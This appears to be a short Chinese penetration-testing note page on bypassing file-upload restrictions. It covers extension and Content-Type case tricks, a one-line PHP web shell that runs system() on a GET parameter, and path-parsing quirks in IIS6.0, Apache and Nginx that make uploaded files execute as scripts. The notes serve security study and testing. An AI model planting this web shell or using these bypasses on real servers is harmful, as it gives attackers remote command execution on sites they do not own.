跳转至

上传绕过

前端

  1. 抓包改后缀名
  2. Content-Type multipart/form-data更改大小写为Multipart/form-data
  3. 更改代码
    <script language="php">
    @system($_GET['c']);
    </script>
    

文件解析漏洞

IIS6.0 - IIS6.0 1.asa 1.asp文件夹时,目录下任何文件当做asp解析。 - 1.asp;1.jpg会被当做asp解析

Apache: 认为一个文件可以拥有多个扩展名,从右到左开始解析,直到判断到可识别文件名为止,例如1.php.xxx

Nginx: /test.jpg/text.php 会把test.jpg当做php解析


评论